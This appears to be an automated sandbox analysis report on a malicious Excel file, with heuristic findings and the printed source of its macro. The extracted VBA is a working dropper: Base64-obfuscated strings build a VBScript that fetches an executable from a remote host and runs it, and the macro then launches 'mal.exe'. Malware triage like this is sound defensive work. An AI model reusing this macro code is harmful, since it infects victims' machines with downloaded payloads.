MALICIOUS
122
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The VBA macro uses the Shell() function to execute a VBScript file named 'j.vbs' located at 'C:\Users\Mr.Teacher\Desktop\j.vbs'. This VBScript is constructed from multiple Base64 encoded strings, which when decoded, form the content of the VBScript. The VBScript then proceeds to write another file, 'a.vbs', to 'C:\Users\Mr.Teacher\Desktop\', and subsequently executes it using 'wscript'. Finally, it attempts to execute 'mal.exe' from 'C:\Users\Username\Desktop\'. The primary function of the VBA macro is to download and execute a second-stage payload via VBScript.
Heuristics 4
-
VBA project inside OOXML medium 2 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 5862 bytes |
SHA-256: 34f16554e7a821911c44a756737e21510dc354dbfdfefc2e581e35af5e57fe4a |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 1 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Module1"
Private Sub ghd()
Dim PayLoadFile As Integer
Dim FilePath As String
FilePath = bd("QzpcVXNlcnNcTXIuVGVhY2hlclxEZXNrdG9wXGoudmJz")
PayLoadFile = FreeFile
Open FilePath For Output As PayLoadFile
Print #PayLoadFile, bd(bd("WkdsdElIZzZJRk5sZENCNElEMGdZM0psWVhSbGIySnFaV04wS0NKTmFXTnliM052Wm5RdVdFMU1TRlJVVUNJcA=="))
Print #PayLoadFile, bd(bd("SUdScGJTQmlPaUJUWlhRZ1lpQTlJR055WldGMFpXOWlhbVZqZENnaVFXUnZaR0l1VTNSeVpXRnRJaWs9"))
Print #PayLoadFile, bd(bd("SUhndVQzQmxiaUFpUjBWVUlpd2dJbWgwZEhCek9pOHZkM2QzTG1OaGNtUmliM2d1WTI5dEwyUnZkMjVzYjJGa0wzTmhiWEJzWlhNeExtVjRaU0lzSUVaaGJITmw="))
Print #PayLoadFile, bd(bd("SUhndVUyVnVaQT09"))
Print #PayLoadFile, bd(bd("SUhkcGRHZ2dZZz09"))
Print #PayLoadFile, bd(bd("SUM1MGVYQmxJRDBnTVE9PQ=="))
Print #PayLoadFile, bd(bd("SUM1dmNHVnU="))
Print #PayLoadFile, bd(bd("SUM1M2NtbDBaU0I0TG5KbGMzQnZibk5sUW05a2VRPT0="))
Print #PayLoadFile, bd(bd("SUM1dVlYWmdkRzliYVd4bElDSkRPbHhWYzdWOWMxeDhiV2x5UVdKaGMxeEVaWE5yZEc5d1hHMW9iQzVsZUdVaUxDQXk="))
Print #PayLoadFile, bd(bd("SUdWdVpDQjNhWFJv"))
Close PayLoadFile
Shell bd("d3NjcmlwdCBDOlxVc2Vyc1xNci5UZWFjaGVyXERlc2t0b3Bcai52YnM=")
Application.Wait (Now + TimeValue("0:00:03"))
Shell bd("QzpcVXNlcnNcVXNlcm5hbWVcRGVza3RvcFxtYWwuZXhl")
End Sub
Function be(inData)
Const Base64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
Dim cOut, sOut, I
For I = 1 To Len(inData) Step 3
Dim nGroup, pOut, sGroup
nGroup = &H10000 * Asc(Mid(inData, I, 1)) + _
&H100 * MyASC(Mid(inData, I + 1, 1)) + MyASC(Mid(inData, I + 2, 1))
nGroup = Oct(nGroup)
nGroup = String(8 - Len(nGroup), "0") & nGroup
pOut = Mid(Base64, CLng("&o" & Mid(nGroup, 1, 2)) + 1, 1) + _
Mid(Base64, CLng("&o" & Mid(nGroup, 3, 2)) + 1, 1) + _
Mid(Base64, CLng("&o" & Mid(nGroup, 5, 2)) + 1, 1) + _
Mid(Base64, CLng("&o" & Mid(nGroup, 7, 2)) + 1, 1)
sOut = sOut + pOut
Next
Select Case Len(inData) Mod 3
Case 1:
sOut = Left(sOut, Len(sOut) - 2) + "=="
Case 2:
sOut = Left(sOut, Len(sOut) - 1) + "="
End Select
be = sOut
End Function
Function MyASC(OneChar)
If OneChar = "" Then MyASC = 0 Else MyASC = Asc(OneChar)
End Function
Function bd(ByVal base64String)
Const Base64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
Dim dataLength, sOut, groupBegin
base64String = Replace(base64String, vbCrLf, "")
base64String = Replace(base64String, vbTab, "")
base64String = Replace(base64String, " ", "")
dataLength = Len(base64String)
If dataLength Mod 4 <> 0 Then
Err.Raise 1, "bd", "Bad Base64 string."
Exit Function
End If
For groupBegin = 1 To dataLength Step 4
Dim numDataBytes, CharCounter, thisChar, thisData, nGroup, pOut
numDataBytes = 3
nGroup = 0
For CharCounter = 0 To 3
thisChar = Mid(base64String, groupBegin + CharCounter, 1)
If thisChar = "=" Then
numDataBytes = numDataBytes - 1
thisData = 0
Else
thisData = InStr(1, Base64, thisChar, vbBinaryCompare) - 1
End If
If thisData = -1 Then
Err.Raise 2, "bd", "Bad character In Base64 string."
Exit Function
End If
nGroup = 64 * nGroup + thisData
Next
nGroup = Hex(nGroup)
nGroup = String(6 - Len(nGroup), "0") & nGroup
pOut = Chr(CByte("&H" & Mid(nGroup, 1, 2))) + _
Chr(CByte("&H" & Mid(nGroup, 3, 2))) + _
Chr(CByte("&H" & Mid(nGroup, 5, 2)))
sOut = sOut & Left(pOut, numDataBytes)
Next
bd = sOut
End Function
Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB
... (truncated)
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: xl/vbaProject.bin | 30208 bytes |
SHA-256: d1edcb673dafdce94d6da8fd37ee5f2f90df0082dab2b6c109fb510591752e00 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 1 long base64-like blob(s).
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.